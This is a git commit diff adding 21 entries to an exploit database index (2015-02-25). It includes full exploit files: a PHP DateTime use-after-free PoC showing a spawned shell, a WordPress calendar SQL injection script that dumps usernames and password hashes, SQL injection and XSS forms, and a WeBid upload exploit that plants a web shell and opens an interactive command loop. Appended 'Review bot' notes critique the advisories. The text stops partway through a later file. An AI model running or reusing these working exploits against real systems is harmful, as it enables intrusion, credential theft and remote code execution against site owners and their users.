Update: 2015-02-25

21 new exploits
Offensive Security 2015-02-25 08:37:34 +00:00
parent 620cbde9f3
commit d944419211
22 changed files with 1556 additions and 1 deletions


@ -22055,7 +22055,7 @@ id,file,description,date,author,platform,type,port
24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 nativeHelper.apply - Remote Code Execution",2013-04-08,agixid,linux,remote,0
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0
24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0
24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69
@ -32499,6 +32499,8 @@ id,file,description,date,author,platform,type,port
36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0
36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0
36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
@ -32513,6 +32515,7 @@ id,file,description,date,author,platform,type,port
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow - MKD Command",2015-02-14,R-73eN,windows,remote,0
36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
@ -32520,6 +32523,8 @@ id,file,description,date,author,platform,type,port
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0
36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0
36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
@ -32578,3 +32583,19 @@ id,file,description,date,author,platform,type,port
36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection Vulnerabilities",2011-09-21,"kurdish hackers team",php,webapps,0
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)",2015-02-23,"Pablo González",php,webapps,80
36158,platforms/php/dos/36158.txt,"PHP DateTime Use After Free Vulnerability",2015-02-23,"Taoguang Chen",php,dos,0
36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF Vulnerability",2015-02-23,"Eric Flokstra",php,webapps,80
36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0
36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0
36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0
36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0
36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0


137
platforms/php/dos/36158.txt Executable file

@ -0,0 +1,137 @@
Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20
A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
static int php_date_initialize_from_hash(php_date_obj **dateobj,
HashTable *myht)
{
zval *z_date;
zval *z_timezone;
zval *z_timezone_type;
zval tmp_obj;
timelib_tzinfo *tzi;
php_timezone_obj *tzobj;
z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
if (z_date) {
convert_to_string(z_date);
z_timezone_type = zend_hash_str_find(myht, "timezone_type",
sizeof("timezone_type")-1);
if (z_timezone_type) {
convert_to_long(z_timezone_type);
z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
if (z_timezone) {
convert_to_string(z_timezone);
...
static int php_date_timezone_initialize_from_hash(zval **return_value,
php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
zval **z_timezone = NULL;
zval **z_timezone_type = NULL;
if (zend_hash_find(myht, "timezone_type", 14, (void**)
&z_timezone_type) == SUCCESS) {
if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
convert_to_long(*z_timezone_type);
if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone)
TSRMLS_CC)) {
return SUCCESS;
}
}
}
return FAILURE;
}
The convert_to_long() leads to the ZVAL and all its children is freed
from memory. However the unserialize() code will still allow to use R:
or r: to set references to that already freed memory. There is a use
after free vulnerability, and allows to execute arbitrary code.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.
<?php
$f = $argv[1];
$c = $argv[2];
$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";
$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
$x = unserialize($data1);
$y = $x[2];
// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";
$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
$z = unserialize($data2);
function ptr2str($ptr)
{
$out = "";
for ($i=0; $i<8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line, then any PHP code can be executed:
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
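Review bot: The advisory has no remediation section, and the Description quotes two functions without saying which PHP branch each listing comes from (the first uses `zend_hash_str_find`, the second `zend_hash_find` with `TSRMLS_DC`). The Affected Versions list implies the fixed releases, so a line such as `Solution: upgrade to PHP 5.6.6 / 5.5.22 / 5.4.38 or later, and do not pass untrusted data to unserialize()` after the Description would make that explicit. The first listing also looks up "date" with `sizeof("data")-1`; both strings have the same length so the lookup is unaffected, but it reads like a typo and deserves a `[sic]`.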

85
platforms/php/webapps/36061.php Executable file

@ -0,0 +1,85 @@
<?php
/*
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
*/
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
$fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
$prefixCurl = curl_init($fullURL);
curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($prefixCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
$tableName = str_replace('####', '', $tableNames[0]);
echo 'tableName: '.$tableName.'<BR/>';
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($usersCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
$from = stripos($result, PATTERN_TO_SEARCH_USERS);
$to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
$result = substr($result, $from, $to-$from);
echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
}
else
{
echo 'Table name fetched, but not users - try to rewrite exploit :-(';
}
}
else
{
echo 'NOT vulnerable :-(';
}
}
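Review bot: The header comment is repeated in full after the licence text, and its `# CVE : CWE-89` line puts a CWE class where a CVE id is expected; keep one header and label the line `# CWE : CWE-89`. In the script body, `$_GET['SRV']` goes straight into the URL given to `curl_init()`, and `$tableName` and the parsed rows are echoed into HTML exactly as the remote host returned them. A copy of this file left in a served directory will therefore request any host a visitor names and render that host's response as markup. Wrapping the echoed values in `htmlspecialchars(..., ENT_QUOTES)` covers the output side. The file names no fixed plugin version; the header only bounds the issue at `<= 1.4.9`.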

45
platforms/php/webapps/36086.txt Executable file

@ -0,0 +1,45 @@
# Exploit Title: WonderPlugin Audio Player 2.0 Blind SQL Injection and XSS
# Date: 20-01-2015
# Software Link: http://www.wonderplugin.com/wordpress-audio-player/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
wp_ajax_save_item() is accessible for every registered user (admin privileges are not checked).
save_item() uses is_id_exist() in which $id is not escaped properly.
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
<input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
<input type="submit" value="Hack!">
</form>
This SQL will check if first password character user ID=1 is "$".
If yes it will sleep 5 seconds.
For XSS use:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
<input type="hidden" name="item[id]" value="1">
<input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'>
<input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'>
<input type="submit" value="Hack!">
</form>
It will be visible on every page where shortcode wonderplugin_audio is used and also in admin panel:
http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items
http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html
3. Solution:
Update to version 2.1
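Review bot: The Description explains only the SQL injection (no privilege check on `wp_ajax_save_item()`, unescaped `$id` in `is_id_exist()`); the XSS shown in section 2 through `item[name]` and `item[customcss]` has no stated root cause. A sentence under `1. Description` such as `item[name] and item[customcss] are stored and later printed without output encoding` would cover it, hedged if the author did not confirm the sink. The `Date: 20-01-2015` header differs from the 2015-02-16 date in the index row for this id; presumably one is discovery and the other publication, and labelling them would avoid confusion.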

28
platforms/php/webapps/36087.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/
vulnerable code [fancybox.php]:
342. if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344. if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346. $settings = stripslashes_deep( $_POST['mfbfw'] );
347. $settings = array_map( 'convert_chars', $settings );
348.
349. update_option( 'mfbfw', $settings );
350. wp_safe_redirect( add_query_arg('updated', 'true') );
exploit:
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
<input type="text" name="action" value="update">
<input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
<input type="submit" value="Send">
</form>
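Review bot: The quoted `fancybox.php` lines 342–350 are presented without saying what is missing from them. Nothing in the excerpt checks a nonce or the caller's capability before `update_option( 'mfbfw', $settings )`, and `stripslashes_deep` and `convert_chars` are the only processing applied to the posted array. One sentence above the excerpt would tell a maintainer what to fix, for example `no check_admin_referer()/current_user_can() call precedes update_option(), and the stored values appear not to be escaped where the option is printed`. The excerpt ends before the enclosing `if` blocks close, so checks elsewhere in the file cannot be ruled out from here. The advisory also lacks a fixed-version or mitigation line.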

142
platforms/php/webapps/36154.txt Executable file

@ -0,0 +1,142 @@
Document Title:
============
Beehive Forum v1.4.4 Stored XSS Vulnerability
Author:
==============
Halil Dalabasmaz
Release Date:
===========
23 Feb 2015
Product & Service Introduction:
========================
Beehive is an open-source project for creating a high-configurable
frame-based discussion forum.
Vendor Homepage:
=================
http://www.beehiveforum.co.uk
Abstract Advisory Information:
=======================
BGA Security Team discovered an Stored XSS vulnerability in
Beehive Forum v1.4.4
Vulnerability Disclosure Timeline:
=========================
20 Feb 2015 - Contact with Vendor
21 Feb 2015 - Vendor Response
22 Feb 2015 - Vendor Fix
23 Feb 2015 - Confirm Fix
23 Feb 2015 - Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Beehive Forum v1.4.4
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
Stored XSS
Tested On:
============
Iceweasel & Chromium
Sample Payload:
=================
http://"><script>alert('XSS');</script>
Proof of Concept (PoC):
=======================
Proof of Concept
The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" on Profile Section.
Following line contain the vulnerability in edit_prefs.php;
if (isset($_POST['homepage_url'])) {
$user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']);
$user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true;
if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) {
$error_msg_array[] = gettext("Homepage URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL"));
$valid = false;
}
}
}
if (isset($_POST['pic_url'])) {
$user_prefs['PIC_URL'] = trim($_POST['pic_url']);
$user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true;
if (strlen(trim($user_prefs['PIC_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) {
$error_msg_array[] = gettext("Picture URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL"));
$valid = false;
}
}
}
if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) {
if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) {
$error_msg_array[] = gettext("Avatar URL must include http:// schema.");
$valid = false;
} else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) {
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL"));
$valid = false;
}
}
Solution Fix & Patch:
================
Upgrade the the script.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of
business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2015 | BGA - Bilgi Güvenli?i Akademisi
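Review bot: `Exploitation Technique: Remote, Unauthenticated` conflicts with the PoC section, which places the vulnerable inputs on the Profile Section in `edit_prefs.php`; editing a profile presumably needs a logged-in account, so the field should read authenticated unless the author verified otherwise. The quoted checks only require the value to start with `http://` (`preg_match('/^http:\/\//u', ...)`) before handing it to `user_check_pref()`, which is presumably why the sample payload is accepted. Saying so, and that the fix belongs in output encoding of the three URL fields, would make the root cause explicit. The third quoted block tests `$user_prefs['AVATAR_URL']` without the `isset($_POST[...])` assignment shown for the other two, so the excerpt appears truncated. `Upgrade the the script.` names no fixed version.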

126
platforms/php/webapps/36155.php Executable file

@ -0,0 +1,126 @@
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
Date : 20 February 2015
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.webidsupport.com/
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
Version : 1.1.1
Tested on : Window and Linux
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
/ajax.php
/inc/plupload/examples/upload.php
#####################################################
DESCRIPTION
#####################################################
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);
http_send($host, $packet);
$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
while(1)
{
print "\nWebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
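Review bot: The VULNERABILITY block lists both `/ajax.php` and `/inc/plupload/examples/upload.php`, but the code only ever requests `ajax.php?do=uploadaucimages`; the second path is never exercised, so the header should say whether it was verified. No fixed version or mitigation is given. For defenders the visible request shape is enough to hunt on: a multipart POST to `ajax.php?do=uploadaucimages` carrying a `.php` filename, followed by GETs under `uploaded/<PHPSESSID value>/` with a `Cmd:` request header. A description line stating that uploads must be restricted by extension and that the upload directory must not execute PHP would name the control that is missing.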

49
platforms/php/webapps/36156.txt Executable file

@ -0,0 +1,49 @@
# Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
# Date : 20 February 2015
# Exploit Author : CWH Underground
